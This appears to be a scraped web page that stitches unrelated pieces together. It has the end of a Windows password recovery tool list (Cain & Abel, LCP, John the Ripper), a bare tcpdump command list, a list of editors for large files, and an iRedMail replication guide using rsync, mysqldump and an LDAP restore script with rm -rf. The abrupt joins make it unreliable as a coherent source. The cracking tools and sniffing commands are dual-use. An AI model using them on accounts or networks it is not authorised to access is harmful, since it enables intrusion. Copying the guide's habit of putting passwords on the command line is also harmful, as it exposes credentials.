Cain & Abel was able to recover the 10-character password to the Windows XP “Administrator” account in ten seconds. I couldn’t get it to work properly in Windows Vista. One user said it works great with Windows 7.

 

 

6. LCP

LCP
LCP is yet another free password recovery software tool for Windows.

Like Cain & Abel, LCP is a standard Windows program you download from LCPSoft’s website and install inside of Windows, meaning you’ll need access to a user account on the computer.

LCP can be a little intimidating to those new to Windows password recovery tools so some prior knowledge is very helpful to avoid even bigger problems with your PC.

I haven’t been able to get LCP to work for me. If you’ve successfully used LCP and would like to share your experiences, please let me know.

 

 
 

7. John The Ripper

John the Ripper is a very popular free password recovery tool that can be used to find Windows account passwords.

While the password recovery application itself is free, the wordlists used by John the Ripper to discover passwords do cost and are required for the software to work.

Note: I’m told there are free wordlist alternatives that work with John the Ripper which is why this Windows password recovery tool is still listed as free. However, I have not tested any of them.

John the Ripper is operated at the command line making it a password cracking tool reserved for the very advanced user.

If you have experience with John the Ripper that you would like to share, please let me know.

 

 

Windows Password Recovery Tools Aren’t Necessary if You’re Proactive!

 

These Windows password recovery tools are great if you need them, but there’s a much easier way to access your account if you forget your password – a password reset disk!

How To Create a Password Reset Disk

A password reset disk is a special disk you can insert in your PC during the logon process that will allow you to change your Windows password without knowing your current password. You will need to create this disk before you lose access to your account!

tcpdump

tcpdump
tcpdump -nn -ni eth0
tcpdump -i eth0
tcpdump -i eth0 -n

tcpdump -nn -ni eth0

tcpdump -nn -ni eth0 host 192.168.1.100

tcpdump -nn -ni eth0 src host 192.168.1.100

tcpdump -nn -ni eth0 dst host 192.168.1.100

tcpdump -nn -ni eth0 src host 192.168.1.100 and dst port 80

tcpdump -nn -ni eth0 host 192.168.1.100 or host 192.168.1.101

tcpdump -i eth0 dst host www.google.com

tcpdump -nn -ni eth0 not host 192.168.1.101

tcpdump -nn -ni eth0 not host 192.168.1.101 -w /tmp/test.pcap

tcpdump -r /tmp/test.pcap -XX

Editor on Windows For more than 2 GB

Community wiki:

Suggestions are

  • gVim loads entire file into memory first.
  • SlickEdit
  • Emacs (has a low maximum buffer size limit if compiled in 32-bit mode).
  • Large Text File Viewer
  • PilotEdit (loads entire file into memory first).
  • HxD hex editor, but good for large files.

Text editors with 2GB limit: Notepad++, Jujuedit, TextPad

IREDMAIL replication server with 1 hour delay or whatever delay you want.

This is not an HA setup, and it does not use any LDAP or MySQL replication engine.

The methodology is just

backup –> transfer –> restore

The tools needed:

i. rsync

ii. NFS daemon

iii. mysqldump and restore (for mysql)

iv. slapcat (for ldap)

v. crond

Let’s start

ON THE MAIN SERVER

1. First of all sync the data in /var/vmail and /var/www to the backup server using rsync:

rsync -av --delete --stats --progress /var/vmail/ root@destination-host:/var/vmail/

Beware of the --delete option: this command will delete data that is on the backup server and not on the primary server.

2. Then sync the www folder

rsync -av --delete --stats --progress /var/www/ root@destination-host:/var/www/

3. Back up MySQL, all databases

mysqldump -u root -pPASSWD --all-databases > /mnt/ur-nfs-mount-folder/all-database.sql

(Please read my previous article on how to set up NFS.)

4. Then run the LDAP backup script provided with the iRedMail tools in /root/iRedmail/tools/. Edit the file and change the backup destination path to /mnt/ur-nfs-mount-folder

5. Add all the commands to crond, for example every 1 hour

0 */1 * * * /root/rsync.sh

 

ON THE BACKUP SERVER

1. Run mysql restore

mysql -pPASSWD < /var/nfs/all-database.sql

2. Create a shell script to restore LDAP as follows

#!/bin/bash
# Create the marker file; abort if that fails
touch /tmp/ldap-restore || exit 1
# Stop slapd before removing its database files
/etc/init.d/ldap stop
rm -rf /var/lib/ldap/domain.com/__*
rm -rf /var/lib/ldap/domain.com/*.bdb
rm -rf /var/lib/ldap/domain.com/alock
rm -rf /var/lib/ldap/domain.com/log.*
# Load the LDIF backup, fix ownership and start slapd again
/usr/sbin/slapadd -f /etc/openldap/slapd.conf -l /var/nfs/backup-ldap.ldif
chown -R ldap:ldap /var/lib/ldap/domain.com/
/etc/init.d/ldap start

3. Run the script from crond; you might schedule it every hour, offset by some minutes to give the primary server time to generate the backup and rsync.